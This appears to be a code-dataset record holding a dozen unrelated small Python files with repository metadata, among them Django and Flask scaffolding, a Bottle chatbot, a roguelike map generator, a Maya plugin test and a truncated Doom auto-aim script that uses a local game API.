duke79/alligator
|
2e58b426e38aa44a5325a910ec9151bf2ea271d1
|
54e699f35b436b370b14e429f8bf072256bccfd5
|
refs/heads/master
| 2023-03-08T19:42:46.440032
| 2018-10-13T07:17:44
| 2018-10-13T07:17:44
| 171,137,809
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,777
|
py
|
import feedparser
from sqlalchemy.exc import DatabaseError
from app import db_session
from app.data.config import Config
from app.data.mysql import MySQL
from app.data.tables.article import Article
from app.data.tables.channel import Channel
from app.data.tables.channel_categories import ChannelCategories
from app.utils import safeDict
def add_channel(url, categories=None): # TODO : Handle categories
channel = feedparser.parse(url)
title = safeDict(channel, ["feed", "title"])
language = safeDict(channel, ["feed", "language"])
image = safeDict(channel, ["feed", "image", "href"])
description = safeDict(channel, ["feed", "subtitle"])
copyright = safeDict(channel, ["feed", "rights_detail", "value"])
copyright = r"%s" % copyright
channel = Channel(link=url,
title=title,
language=language,
image=image,
description=description,
copyright=copyright)
try:
ret = channel.save()
# ret = Channel.query.filter(Channel.title == title).first()
for category in categories:
channelCategory = ChannelCategories(category_id=category,
channel_id=ret.id)
channelCategory.save()
return ret
except DatabaseError as e:
code = e.orig.args[0]
if code == 1062:
ret = Channel.query.filter(Channel.link == url).first()
return ret
return None
def remove_channel(id):
res = Channel.query.filter_by(id=id).first()
res.delete()
def update_channel(id, url=None, categories=None): # TODO : Handle categories
channel = feedparser.parse(url)
title = safeDict(channel, ["feed", "title"])
language = safeDict(channel, ["feed", "language"])
image = safeDict(channel, ["feed", "image", "href"])
description = safeDict(channel, ["feed", "subtitle"])
copyright = safeDict(channel, ["feed", "rights_detail", "value"])
copyright = r"%s" % copyright
res = Channel.query.filter_by(id=id).first()
res.update(link=url,
title=title,
language=language,
image=image,
description=description,
copyright=copyright)
def get_channels(ids=None, category_id=None, match_in_url=None, limit=None): # TODO : Add where clause, filters
"""
Ref: https://stackoverflow.com/questions/3332991/sqlalchemy-filter-multiple-columns
:param ids:
:param category_id:
:param match_in_url:
:param limit:
:return:
"""
ret = Channel.query
if match_in_url:
ret = ret.filter(Channel.link.like("%" + match_in_url + "%"))
ret = ret.limit(limit)
return ret
|
[
"pulkitsingh01@gmail.com"
] |
pulkitsingh01@gmail.com
|
4c45d226e473cbf5a897adaf78f7abab91310417
|
d1c31f9fcf6cc1c0e109e417ed8f30238529daa5
|
/tasKing_api/tasks/migrations/0002_teammember.py
|
b34752e36bd281ac85e130d678af23def79d93b9
|
[] |
no_license
|
divyashreedivya/TasKing-api
|
5c7f25aff506a5dba340c45e829a962183bba07a
|
c23e8796d3ca598346aeb6e14db6a55f4b00bc1d
|
refs/heads/main
| 2023-08-14T21:29:58.134791
| 2021-09-24T20:21:26
| 2021-09-24T20:21:26
| 410,091,787
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 853
|
py
|
# Generated by Django 3.2.7 on 2021-09-23 20:48
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('tasks', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='TeamMember',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('member', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='member', to=settings.AUTH_USER_MODEL)),
('team', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='team', to='tasks.team')),
],
),
]
|
[
"divyamanipal01@gmail.com"
] |
divyamanipal01@gmail.com
|
dfc2a6b2776b3db293b2e9262e7c7becdd1e1e12
|
369c041097deb83c41b5500f2915d4f868c2404f
|
/task_2/app.py
|
386654df63fd1f717ab878fcf42e6427ee64ea10
|
[] |
no_license
|
Ternavskyi/summer_school
|
602cef172dbd9e16e7b17c615a614dbf2ce94194
|
5c8e3ead4ee592a91ca5e640d85163a7b5c44812
|
refs/heads/master
| 2021-01-20T18:47:47.412812
| 2016-07-14T03:25:56
| 2016-07-14T03:25:56
| 62,992,030
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,368
|
py
|
import random
from bottle import default_app, route, run, view, request, response
from models import Message
YES_LIST = [
"yes",
"affirmative",
"amen",
"fine",
"good",
"okay",
"true",
"yea",
"all right",
"aye",
"beyond a doubt",
"by all means",
"certainly",
"definitely",
"even so",
"exactly",
"gladly",
"good enough",
"granted",
"indubitably",
"just so",
"most assuredly",
"naturally",
"of course",
"positively",
"precisely",
"sure thing",
"surely",
"undoubtedly",
"unquestionably",
"very well",
"willingly",
"without fail",
"yep"
]
NO_LIST = [
"no",
"negative",
"nix",
"absolutely not",
"by no means",
"never",
"no way",
"not at all",
"not by any means",
"nix",
"nay",
"never",
"not"
]
QUESTIONS = [
'Are you ok?',
'Do you like Python?',
'Do you like Javascript?',
'Have you heard about async\\await in Python?',
'Are you aware about JS Promises?',
'Do you use the lastest version of your browser?',
'Was your day ok?',
'Do you like pizza?'
]
CONFIRMATION_MSG = 'I didn\'t understand you. '\
'Do you still want to talk?'
START_TALK_MSG = 'Yey. Let\'s talk.\n'
@route('/')
@view('index')
def hello_world():
return {}
def preprocess_msg(msg):
return msg.lower().strip(' \r\n,.')
def get_msg_type(msg):
if msg in YES_LIST:
return 'yes'
if msg in NO_LIST:
return 'no'
return 'unknown'
@route('/bot', method='POST')
def bot():
was_confirmation = request.forms.get('confirmation', 'false') == 'true'
message = request.forms.get('message', '')
message = preprocess_msg(message)
if message:
msg_type = get_msg_type(message)
finish = was_confirmation and msg_type == 'no'
if msg_type == 'unknown':
confimation = True
res = CONFIRMATION_MSG
else:
confimation = False
res = random.choice(QUESTIONS)
if was_confirmation and msg_type == 'yes':
res = START_TALK_MSG + res
Message(message=message, response=res).save()
return {'text': res,
'confirmation': confimation,
'finish': finish}
response.status = 400
return {'error': 'Bad message provided.'}
application = default_app()
run(application, threaded=True)
|
[
"ternavskyi.roman@gmail.com"
] |
ternavskyi.roman@gmail.com
|
e566806dd954cb8355edee63eeff20ed396c643b
|
a0a3b289d8e86f2da499e0283bc87a33bf3b7730
|
/site/site1/settings.py
|
e20e00946cc815a26932621decd30bd72feda2dc
|
[] |
no_license
|
v-rudin/blog
|
aa636050af1aa9b291b3065b92e820196880868d
|
fead80994fb7a24f6475550c384c72c635446156
|
refs/heads/master
| 2020-04-05T11:54:39.140637
| 2018-11-09T12:01:07
| 2018-11-09T12:01:07
| 156,849,838
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,165
|
py
|
"""
Django settings for site1 project.
Generated by 'django-admin startproject' using Django 2.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'b1skle6jwm5$d66gg)aald7hf5&zizgm&a1nwrn)c7u+*%lutn'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['192.168.0.205']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'site1.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'site1.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'ru-ru'
TIME_ZONE = 'Europe/Moscow'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
|
[
"ap@progm.ru"
] |
ap@progm.ru
|
2f4f00b6691d1c4423b52d21af57d2756cc78463
|
0aa1a16c136ceb0afe10ec1094282deb27128de4
|
/Udacity - FSND/projects/01_fyyur/starter_code/config.py
|
6a943e5894fe3301db01f1b4912a9ccfdcfc7d7e
|
[] |
no_license
|
linahhamdan/courses
|
36013ea28b8ccbafac8e756223574e68ad08f9e4
|
47c2d01d5483266bd21b49b42559f79139be297d
|
refs/heads/main
| 2023-01-12T00:21:24.891220
| 2020-11-20T14:02:46
| 2020-11-20T14:02:46
| 302,576,768
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 528
|
py
|
import os
SECRET_KEY = os.urandom(32)
# Grabs the folder where the script runs.
basedir = os.path.abspath(os.path.dirname(__file__))
# Enable debug mode.
DEBUG = True
# Connect to the database
class DatabaseURI:
DATABASE_NAME = "fyyur"
username = 'postgres'
password = ''
url = '127.0.0.1:5432'
SQLALCHEMY_DATABASE_URI = "postgres://{}:{}@{}/{}".format(
username, password, url, DATABASE_NAME)
SQLALCHEMY_DATABASE_URI = 'postgresql://postgres@:5432/fyyur'
SQLALCHEMY_TRACK_MODIFICATIONS = False
|
[
"linah.hamdan@kapsarc.org"
] |
linah.hamdan@kapsarc.org
|
c3b8845978fac8cfa735af881c0a55ce00ccf926
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_326/ch6_2020_03_09_19_29_35_692924.py
|
62c78804fbf0b43e0866b1d8788774568a3b42ba
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 134
|
py
|
def celsius_para_fahrenheit(celsius):
temperatura_equivalente_em_F = (celsius * 9/5) + 32
return temperatura_equivalente_em_F
|
[
"you@example.com"
] |
you@example.com
|
6b332b79588d1f2cabf045f710391aad9fa34745
|
c9f7c5515a8d6344d08d97e53b5733fb64f9dd76
|
/server.py
|
5003fccbb339841394508e019116025e74988e55
|
[] |
no_license
|
jim1406g/get_datetime_server
|
be8b6533628cffbc721947bc3fda0f5d8b1ee87f
|
9e69c2dc7017283f4cb3574a19e9113c122ac2ae
|
refs/heads/master
| 2023-01-22T05:40:54.699219
| 2020-11-30T15:45:23
| 2020-11-30T15:45:23
| 317,270,894
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 227
|
py
|
import datetime
import pytz
from flask import Flask
app = Flask(__name__)
@app.route("/")
def hello():
return str(datetime.datetime.now(pytz.timezone("Europe/Moscow")))
if __name__ == "__main__":
app.run(host='0.0.0.0')
|
[
"mzhihalkin@vp.ru"
] |
mzhihalkin@vp.ru
|
8cb8230380b4d1ad1f573c320fd5ec262f0c769e
|
493605f0adbd9248d7080fcef42a4bc312621e4b
|
/procgen.py
|
b24f012da6baa5bddf61ec555c6c416b508fa36b
|
[] |
no_license
|
wlpj2011/test-roguelike
|
bfe2ff68c9c47c1b171f5519d49b4ca31ce24c3d
|
5163214d84c4d0312762da9078f9a08bd89dad8e
|
refs/heads/main
| 2023-06-23T09:56:20.264888
| 2021-07-23T00:52:12
| 2021-07-23T00:52:12
| 385,398,386
| 2
| 0
| null | 2021-07-21T17:28:36
| 2021-07-12T22:19:58
|
Python
|
UTF-8
|
Python
| false
| false
| 5,695
|
py
|
from __future__ import annotations
from typing import Dict, Iterator,List,Tuple,TYPE_CHECKING
import random
import tcod
from game_map import GameMap
import tile_types
import entity_factories
if TYPE_CHECKING:
from engine import Engine
from entity import Entity
max_items_by_floor = [
(1,1),
(4,2),
]
max_monsters_by_floor = [
(1,2),
(4,3),
(6,5),
]
item_chances: Dict[int, List[Tuple[Entity,Int]]] = {
1: [(entity_factories.health_potion, 35)],
2: [(entity_factories.confusion_scroll,10)],
4: [(entity_factories.lightning_scroll,25),(entity_factories.sword,5)],
6: [(entity_factories.fireball_scroll,25),(entity_factories.chain_mail,15)],
}
enemy_chances: Dict[int, List[Tuple[Entity,Int]]] = {
1: [(entity_factories.goblin,80),(entity_factories.orc,30)],
3: [(entity_factories.orc,50),(entity_factories.troll, 15)],
5: [(entity_factories.troll, 30)],
7: [(entity_factories.troll, 60)],
}
def get_max_value_for_floor(
weighted_chance_by_floor: List[Tuple[int,int]],
floor: int,
)-> int:
current_value = 0
for floor_minimum, value in weighted_chance_by_floor:
if floor_minimum > floor:
break
else:
current_value = value
return current_value
def get_entities_at_random(
weighted_chance_by_floor: Dict[int, List[Tuple[Entity,int]]],
number_of_entities: int,
floor: int,
)->List[Entity]:
entity_weighted_chances = {}
for key, values in weighted_chance_by_floor.items():
if key > floor:
break
else:
for value in values:
entity = value[0]
weighted_chance = value[1]
entity_weighted_chances[entity] = weighted_chance
entities = list(entity_weighted_chances.keys())
entity_weighted_chances_values = list(entity_weighted_chances.values())
chosen_entities = random.choices(
entities, weights = entity_weighted_chances_values, k = number_of_entities,
)
return chosen_entities
class RectangularRoom:
"""returns a rectangular room with a corner at x,y and with given height and width"""
def __init__(self,x,y,width,height):
self.x1 = x
self.y1 = y
self.x2 = x + width
self.y2 = y + height
@property
def center(self)->Tuple[int,int]:
center_x = (self.x1 + self.x2)//2
center_y = (self.y1 + self.y2)//2
return center_x, center_y
@property
def inner(self)->Tuple[slice,slice]:
return slice(self.x1+1,self.x2),slice(self.y1+1,self.y2)
def intersects(self, other:RectangularRoom)-> bool:
"""Return True if this room overlaps with another RectangularRoom."""
return(self.x1 <= other.x2 and self.x2 >= other.x1 and self.y1 <= other.y2 and self.y2 >= other.y1)
def place_entities(
room: RectangularRoom,
dungeon: GameMap,
floor_number: int,
) -> None:
number_of_monsters = random.randint(0,get_max_value_for_floor(max_monsters_by_floor,floor_number))
number_of_items = random.randint(0,get_max_value_for_floor(max_items_by_floor,floor_number))
monsters: List[Entity] = get_entities_at_random(
enemy_chances, number_of_monsters, floor_number
)
items: List[Entity] = get_entities_at_random(
item_chances, number_of_items, floor_number
)
for entity in monsters + items:
x = random.randint(room.x1 + 1,room.x2 - 1)
y = random.randint(room.y1 + 1,room.y2 - 1)
if (not any(entity.x == x and entity.y ==y for entity in dungeon.entities)) and (not (x ,y)== dungeon.upstairs_location):
entity.spawn(dungeon,x,y)
def tunnel_between(start: Tuple[int,int],end: Tuple[int,int])->Iterator[Tuple[int,int]]:
"""Return an L-shaped tunnel between start and end"""
x1,y1 = start
x2,y2 = end
if random.random()<0.5:
corner_x,corner_y = x2,y1
else:
corner_x,corner_y = x1,y2
for x,y in tcod.los.bresenham((x1,y1),(corner_x,corner_y)).tolist():
yield x,y
for x,y in tcod.los.bresenham((corner_x,corner_y),(x2,y2)).tolist():
yield x,y
def generate_dungeon(max_rooms: int,
room_min_size: int,
room_max_size: int,
map_width: int,
map_height: int,
engine: Engine)->GameMap:
player = engine.player
dungeon = GameMap(engine,map_width,map_height,entities = [player])
rooms: List[RectangularRoom] = []
center_of_last_room = (0,0)
for r in range(max_rooms):
room_width = random.randint(room_min_size,room_max_size)
room_height = random.randint(room_min_size,room_max_size)
x = random.randint(0,map_width - room_width - 1)
y = random.randint(0,map_height - room_height - 1)
new_room = RectangularRoom(x,y,room_width,room_height)
if any(new_room.intersects(other_room) for other_room in rooms):
continue
dungeon.tiles[new_room.inner] = tile_types.floor
if len(rooms)==0:
pass
else:
for x,y in tunnel_between(new_room.center,rooms[-1].center):
dungeon.tiles[x,y] = tile_types.floor
center_of_last_room = new_room.center
rooms.append(new_room)
for room in rooms:
place_entities(room,dungeon,engine.game_world.current_floor)
dungeon.downstairs_location = center_of_last_room
dungeon.tiles[center_of_last_room] = tile_types.down_stairs
dungeon.upstairs_location = rooms[0].center
if engine.game_world.current_floor > 1:
dungeon.tiles[dungeon.upstairs_location] = tile_types.up_stairs
return dungeon
|
[
"wlpj2011@gmail.com"
] |
wlpj2011@gmail.com
|
7107117c90a0bd9e5cccfdb44d57cab3c2348581
|
8a57b4213435baa0c4431d77d0daacfaf97b8f87
|
/lab01/lab01/settings.py
|
c86a2bde46c5341e8d677573b0b1d303255a2330
|
[
"MIT"
] |
permissive
|
jvazkback/TECSUP-DAE-2021-2
|
eaaa3e2ba1c5aad8adc90ea8dae40120f7ea2fd4
|
28af4ebc1b9428f3ec9124fc2ac057d4866d46c9
|
refs/heads/main
| 2023-07-18T01:37:03.152916
| 2021-08-28T21:43:59
| 2021-08-28T21:43:59
| 397,650,863
| 0
| 0
|
MIT
| 2021-08-28T21:44:00
| 2021-08-18T15:31:45
|
Python
|
UTF-8
|
Python
| false
| false
| 3,236
|
py
|
"""
Django settings for lab01 project.
Generated by 'django-admin startproject' using Django 3.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-8wd8^$z&k0he945%jzx%7+o5_%s@o2huqch4xvp063s=k=5nnx'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'lab01.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'lab01.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
|
[
"jvazkback@hotmail.com"
] |
jvazkback@hotmail.com
|
333f777a6bacfac3e41306924dcc6a4b415c5aa8
|
c7e441f1757aea99d85c1bed199b6d2151868ab3
|
/venv/lib/python3.6/sre_constants.py
|
d4f7ed8c0a1b2ca669d3b2395ae792db58b2d85b
|
[] |
no_license
|
visarad/REST-API-WITH-FLASK
|
428f3a83d6529c8680d79dc7157c2e83e3068d49
|
7231823a511b9783376c95155aa37a59d1897b18
|
refs/heads/master
| 2021-04-15T16:18:51.104640
| 2018-03-23T11:03:49
| 2018-03-23T11:03:49
| 126,468,797
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 55
|
py
|
/Users/pararthi/anaconda/lib/python3.6/sre_constants.py
|
[
"visarad@github.com"
] |
visarad@github.com
|
c728ae87bedf61ae87a3b9715df359479018fde4
|
a08cbd5e9b4e4a037deaaae1749ed4dc55c79661
|
/test/IECoreMaya/ObjectDataTest.py
|
b61ac51f2f90642c99a252ee1471e27d8838e253
|
[] |
no_license
|
victorvfx/cortex
|
46385788b12dae375c1a5ade26d8f403d2dbccff
|
deb23599c8c69eac5671e59fe1a8ca0d5e943a36
|
refs/heads/master
| 2021-01-16T23:11:39.139147
| 2017-06-23T12:39:41
| 2017-06-23T12:39:41
| 95,709,763
| 1
| 0
| null | 2017-06-28T20:40:12
| 2017-06-28T20:40:12
| null |
UTF-8
|
Python
| false
| false
| 3,927
|
py
|
##########################################################################
#
# Copyright (c) 2011, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import maya.cmds
import maya.OpenMaya
import IECore
import IECoreMaya
class ObjectDataTest( IECoreMaya.TestCase ) :
def setUp( self ) :
IECoreMaya.TestCase.setUp( self )
if not maya.cmds.pluginInfo( "ObjectDataTestNode.py", query=True, loaded=True ) :
maya.cmds.loadPlugin( "ObjectDataTestNode.py" )
def testReadWrite( self ) :
node = maya.cmds.createNode( "ieObjectDataTestNode" )
compoundData = IECore.CompoundData( {
"val1" : IECore.FloatData( 1 ),
"val2" : IECore.StringData( "val2Data" ),
"val3" : {
"val3.val1" : IECore.IntData( 100 ),
},
} )
IECoreMaya.ToMayaPlugConverter.create( compoundData ).convert( node + ".objectData" )
plugValue = IECoreMaya.FromMayaPlugConverter.create( node + ".objectData" ).convert()
self.assertEqual( plugValue, compoundData )
# try saving and loading an ascii file
maya.cmds.file( rename = os.getcwd() + "/test/IECoreMaya/objectDataTest.ma" )
sceneFileName = maya.cmds.file( force = True, type = "mayaAscii", save = True )
maya.cmds.file( new=True, force=True )
maya.cmds.file( sceneFileName, force=True, open=True )
loadedCompoundData = IECoreMaya.FromMayaPlugConverter.create( node + ".objectData" ).convert()
self.assertEqual( loadedCompoundData, compoundData )
# try saving and loading a binary file
maya.cmds.file( rename = os.getcwd() + "/test/IECoreMaya/objectDataTest.mb" )
sceneFileName = maya.cmds.file( force = True, type = "mayaBinary", save = True )
maya.cmds.file( new=True, force=True )
maya.cmds.file( sceneFileName, force=True, open=True )
loadedCompoundData = IECoreMaya.FromMayaPlugConverter.create( node + ".objectData" ).convert()
self.assertEqual( loadedCompoundData, compoundData )
def tearDown( self ) :
maya.cmds.file( new = True, force = True )
maya.cmds.flushUndo()
maya.cmds.unloadPlugin( "ObjectDataTestNode.py" )
for f in [
"./test/IECoreMaya/objectDataTest.ma",
"./test/IECoreMaya/objectDataTest.mb",
] :
if os.path.exists( f ) :
os.remove( f )
if __name__ == "__main__":
IECoreMaya.TestProgram( plugins = [ "ieCore" ] )
|
[
"john@image-engine.com"
] |
john@image-engine.com
|
1b9b039dbe5f42cbf9f670db513e766d387099dd
|
46b8db1e9931a63f144662667c291f7af69a9309
|
/AI/Machine learning/CVOXPT.py
|
a20f7aa1ff3ba66fb94a5a5f636946eea662c78f
|
[] |
no_license
|
tranbaohieu/MachineLearningBasic
|
2106af285ed9b9866b0748fde03fe70de3cb9169
|
40e96b1b360df51ee488e179f2e4055e85975ffb
|
refs/heads/master
| 2020-05-19T22:09:53.455995
| 2019-05-06T17:19:28
| 2019-05-06T17:19:28
| 185,240,600
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 489
|
py
|
from __future__ import print_function
import numpy as np
import matplotlib.pyplot as plt
from scipy.spatial.distance import cdist
np.random.seed(22)
means = [[2, 2], [4, 2]]
cov = [[.3, .2], [.2, .3]]
N = 10
X0 = np.random.multivariate_normal(means[0], cov, N) # class 1
X1 = np.random.multivariate_normal(means[1], cov, N) # class -1
X = np.concatenate((X0.T, X1.T), axis = 1) # all data
y = np.concatenate((np.ones((1, N)), -1*np.ones((1, N))), axis = 1) # labels
print(X)
#print(y)
|
[
"hieubkls98@gmail.com"
] |
hieubkls98@gmail.com
|
ae1c13e88a5f86f23ba97c65f55bbb3d0a5e5c20
|
ed411cf508b81d2fb314fd1a1b574dc76b865d50
|
/Cat.py
|
36cb04730366d6ab32b2d975a9cd2f3373ac641d
|
[] |
no_license
|
sriharivaleti/Python3_July2020
|
8e767428082f79af1951a285e2609ac391ae6743
|
52ad3310a4cb61746ff5f10996b3cd506507bda5
|
refs/heads/main
| 2023-03-05T11:16:39.724081
| 2021-02-15T06:39:59
| 2021-02-15T06:39:59
| 338,987,712
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 537
|
py
|
class Cat:
species = 'mammal'
def __init__(self, name, age):
self.name = name
self.age = age
# 1 Instantiate the Cat object with 3 cats
cat1 = Cat("sree",34)
cat2 = Cat("hari",32)
cat3 = Cat("jyo",31)
# 2 Create a function that finds the oldest cat
def get_oldest_cat(*args):
return max(args)
# 3 Print out: "The oldest cat is x years old.". x will be the oldest cat age by using the function in #2
print(f"The oldest cat is {get_oldest_cat(cat1.age, cat2.age, cat3.age)} years old.")
|
[
"noreply@github.com"
] |
noreply@github.com
|
48f2bac777a5668df5a8aab9fac523b3b248a256
|
7f1a6dccd135776de1725e0c7a56f6348c8c3df0
|
/recreationalnuclearbombs.py
|
beab6d4982f07b55f82fbdb520b628ffb163ae59
|
[] |
no_license
|
CorwinAnsley/dumber_doom
|
7ca2195a208dd61052fa6026e93e1b8d1797bab1
|
9f8389165c0acd07f18ce0f778766e58b95d35ea
|
refs/heads/master
| 2021-10-13T12:49:35.661811
| 2017-10-29T14:04:56
| 2017-10-29T14:04:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,601
|
py
|
import requests
import json
import math
import random
import aim_at_point
portvariable = 6001
def Aimbot(target, list_pl, shots):
from pprint import pprint as pp
connect = "http://localhost:%s/api/player" % portvariable
r = requests.get(connect)
Xtarget = []
Ytarget = []
Targetlist = []
px = r.text
playerid = (json.loads(px))["id"]
print(list_pl)
for entity in list_pl:
if entity["type"] == target and not entity["isConsolePlayer"]:
Targetlist.append(entity["id"])
tempo = (entity["position"])
Xtarget.append(tempo["x"])
Ytarget.append(tempo["y"])
if len(Xtarget) > 0:
minX = Xtarget[0]
minY = Ytarget[0]
minangle = aim_at_point.find_angle(minX, minY)
for i in range(len(Xtarget)):
angle = aim_at_point.find_angle(Xtarget[i],Ytarget[i])
if angle < minangle:
minX = Xtarget[i]
minY = Ytarget[i]
aim_at_point.aim_point(minX,minY)
for jeff in range(shots):
for elt in Targetlist:
derpstring = 'http://localhost:%s/api/world/los/%s/%s' % (portvariable,playerid,elt)
lineos = requests.get(derpstring)
memes = lineos.text
lineos2 = json.loads(memes)
if "los" in lineos2:
